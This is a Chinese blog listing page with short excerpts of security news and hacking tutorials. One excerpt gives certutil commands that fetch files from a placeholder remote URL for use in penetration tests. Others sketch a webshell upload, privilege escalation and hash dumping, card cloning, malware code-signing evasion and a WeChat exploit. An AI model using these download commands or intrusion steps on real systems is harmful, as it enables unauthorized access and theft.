- 博客(14)
- 收藏
- 关注
RSS订阅转载 路由器密码太弱,IP 被黑客利用发虐童图片 无辜夫妇甚至想自杀
hello!大家好!欢迎关注我的公众号:网络安全情报局关键词路由器对于普通人来说,经历了疫情的洗礼之后,都会希望 2021 能对自己好一些。但是对于一对倒霉的夫妇来说,2021 似乎更难。一月份的一个早晨,凯特和马修(化名)正在伦敦家中,突然当地警察来敲门,他们正在调查一起非常严重的犯罪案件,其中包括网上发布的虐待儿童的图片。这对无辜的夫妇对此毫不知情,本以为是一场简单的误会,但是却拖了两个月,而他们试图为自己洗清冤屈的过程堪比 " 地狱 ",在这个过程中,他们甚至想过自杀.
2021-05-28 14:01:55
761
转载 蓝牙新漏洞为攻击者穿上隐形衣
hello!大家好!欢迎来到网络安全局!近日有研究表明,攻击者可以利用蓝牙核心和网格配置文件规范中新发现的安全漏洞伪装成合法设备,并进行中间人(MitM)攻击。卡内基梅隆大学CERT协调中心在周一发布的一份咨询报告中说: “支持蓝牙核心和网格规范的设备很容易受到模拟攻击和AuthValue披露,这可能会使攻击者在配对过程中冒充合法设备。”这两个蓝牙规范定义了允许通过短距离无线技术进行多对多通信的标准,以促进自组织网络中设备之间的数据传输。蓝牙假冒攻击(又称BIAS)使恶意..
2021-05-28 09:16:22
289
转载 实战分享:用算力洗白病毒
hello!大家好!欢迎来到网络安全情报局!今天网络安全特工为大家分享一次“洗白”病毒的经历。有一个小村庄,村民分为好人与坏人。村委会给认定的好人颁发带指纹的好人卡,拥有好人卡的村民畅行无阻,而没卡的坏人则处处受阻。在这个机制下,小村庄得以维持着暂时的平静安宁。当我们用攻防对抗的视角来看,会发现小村庄的“好人卡机制”并非牢不可破——坏人有没有可能搞到一张好人卡,从而伪装身份为非作歹呢?放在数字世界里,如果“好人”是正常程序,“坏人”是恶意程序,“好人卡”则是数字证书签名。当坏人想要洗白,关键问题
2021-05-27 14:35:12
282
转载 小白必看!渗透测试的8个步骤
渗透测试与入侵的区别渗透测试:以安全为基本原则,通过攻击者以及防御者的角度去分析目标所存在的安全隐患以及脆弱性,以保护系统安全为最终目标。入侵:通过各种方法,甚至破坏性的操作,来获取系统权限以及各种敏感信息。一般渗透测试流程1. 明确目标l 确定范围:测试目标的范围、ip、域名、内外网、测试账户。l 确定规则:能渗透到什么程度,所需要的时间、能否修改上传、能否提权、等等。l 确定需求:web应用的漏洞、业务逻辑漏洞、人员权限管理漏洞、等等。2. 信息收集、..
2021-05-27 12:01:16
1674
转载 最新消息!美国FBI出现内鬼,利用程序漏洞秘密转移国家机密文件
hello!大家好!欢迎来到网络安全情报局!也可以关注我的公众号:网络安全情报局获取最新的资讯。美国司法部(DoJ)起诉联邦调查局(FBI)的一名雇员,称其在2004年6月至2017年12月的长达13年期间,非法转移众多国家安全文件,并且故意保留在她的个人住宅中。根据周五公开的未密封起诉书,联邦起诉书指控48岁的肯德拉·金斯伯里(Kendra Kingsbury)有两项未经授权拥有与国防有关的文件的罪名。Kingsbury在联邦调查局堪萨斯城分部担任情报分析师超过12年,直到2017年被停.
2021-05-27 10:44:56
530
转载 get新技能!把学校饭卡复制到小米手环NFC版本上
*严正声明:本文仅限于技术讨论与分享,严禁用于非法途径。hello!大家好,欢迎来到网络安全情报局,网络安全特工将持续为您分享最新资讯、干货。也可以关注我的公众号:网络安全情报局,获取最新消息。一、NFC是什么?NFC是Near Field Communication缩写,即近距离无线通讯技术。由飞利浦公司和索尼公司共同开发的NFC是一种非接触式识别和互联技术,可以在移动设备、消费类电子产品、PC和智能控件工具间进行近距离无线通信。NFC功能提供了一种简单、触控式的解决方案,可以让消费者简单
2021-05-27 09:07:52
7914
转载 干货分享:渗透测试中常用的文件下载方式
0x01 Windowscertutilcertutil是Windows自带的工具,具有下载文件,校验文件MD5、SHA1、SHA256,文件base64编码等功能。使用certutil下载文件,保存在当前路径,文件名称与下载文件名称相同:certutil -urlcache -split -f http://remote.url/certutil.test保存当前路径,指定保存文件名称:certutil -urlcache -split -f http://rem.
2021-05-26 17:32:52
1433
转载 大佬手把手教你信息收集与挖掘漏洞,包教包会
漏洞挖掘是安全中比较核心的一个方向,无论是个人安全爱好者的研究还是企业的安全建设很多工作都是围绕漏洞来做的。而在做漏洞挖掘前得先做信息收集以下是我的一些小心得!一、信息收集1,获取域名的whois信息,获取注册者邮箱姓名电话等。不同的whois查询站点隐藏的目标信息项目和部分不一样,所以要综合多个whois站点进行查询,收集的信息更加全面,此外充分利用好whois反查功能。2,查询服务器旁站以及子域名站点,收集子域名的文章很多,自行百度即可,我用的比较多的是oneforall,layer,因
2021-05-26 16:31:52
967
转载 安卓应用再现用户隐私泄露事件!约1亿人中招
hello!大家好!欢迎来到网络安全情报局!5月21日消息,Check Point研究人员在分析报告中表示,约1亿用户的隐私数据遭泄露,原因是多个安卓应用中的错误配置,导致这些数据可能成为恶意行为者眼中的“肥肉”。Check Point在分析报告中说:"由于应用程序在配置和集成第三方云服务时没有遵循最佳做法,约1亿用户的个人数据被暴露。”"这种类型的错误不仅影响用户,还会影响开发人员。错误的配置使用户的个人数据和开发人员的内部资源,如更新机制的访问权、存储等置于风险之中。"这一发现来自于对官
2021-05-26 15:00:06
284
原创 一篇文章告诉你如何入门网络安全行业
Hello!大家好!欢迎来到网络安全情报局,最近收到很多小伙伴的私信,对黑客技术很感兴趣,但是不知道如何着手学习,今天就为大家带来详细的解答。如果觉得对你有用记得点赞分享哦!话不多说,直接进入正文01准备当你决定做要开始学习一个新的领域时,你需要考虑以下几个问题。1)要考虑清楚你为何要学这个说白了就是你的动机是什么,如果你的动机是不可持续的,例如盗个QQ(甚至是挖个系统0Day漏洞),但是只有持续类的动机才能让你有一个更加长久的动力源泉,才能促使你坚持的...
2021-05-26 10:44:47
1601
1
转载 细思极恐!家中电视机正在监视所有联网设备
Hello!大家好!欢迎来到网络安全情报局,一起跟随网络安全特工走进危机四伏的网络世界。近日有网友反映,在使用创维电视时,发现电视每10分钟就扫描一遍所有的联网设备,用户的主机名、MAC地址和IP地址甚至周边邻居的wifi名称等隐私信息都被打包发送到了一家名为“勾正数据”的企业。用户发帖这家勾正数据,为何能进入创维电视内置的应用程序?拿到的数据又被用作什么?超限收集用户信息隐私安全如何保护?资料显示,勾正数据是一家智能营销第三方大数据公...
2021-05-25 18:06:35
437
转载 某宝找人代写作业,发现信息被泄露,店家回复:遭黑客攻击
近日,一小伙在淘宝找人代写作业后,半个月内接到多个骚扰电话和诈骗电话,觉得自己信息被严重泄漏,找店家质问,店家回复:代写链接遭黑客攻击。黑客是如何做到的?一个弱口令进了后台其实这个站有注入,不过既然进了后台,那肯定要去shell啊,找了个学生的账号登陆进入发现了头像上传点可以任意文件上传直接传了个大马,执行命令看下权限这权限也太小了吧,先来提权,看下补丁这还不随便打了,传了几个提权exe之后发现都执行不了,可能被杀软杀掉了,然后尝试抓hash...
2021-05-25 18:03:02
597
转载 渗透某果聊APP,解救上千受害者
Hello!大家好!欢迎来到网络安全情报局,一起跟随网络安全特工走进危机四伏的网络世界。某老哥在某款luo聊APP中招了,找到我,发了APP后,我逐步分析,发现该APP没加壳。尝试反编译,好像有混淆,我直接选择模拟器抓包,抓出交互的API地址api地址为:http://XXXX:6003/api/uploads/apismsAPP主要行为为通过APP获取通讯录权限,短信,相册权限,通过api上传相关信息拿到api地址好办了,扫描服务器端口,发现6002端口,...
2021-05-25 18:00:48
2659
8
转载 微信链接不要随便点!小心电脑电脑被黑客操控
Hello!大家好!欢迎来到网络安全情报局,一起跟随网络安全特工走进危机四伏的网络世界。当然大家也可以关注我的公众号:网络安全情报局,更多的网络安全资讯、海量干货以及一些 实用工具等你来解锁!近期,我们的网络安全特工发现微信存在高危漏洞!只要点击链接,你的电脑就可能被黑客完全控制!下面网络安全情报局为大家揭秘黑客是如何操作的。注:以下仅供分享,其它违法行为均与作者无关1、漏洞利用的html,通过html调用JavaScript<script src = "wa.js"...
2021-05-25 17:57:28
2352
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人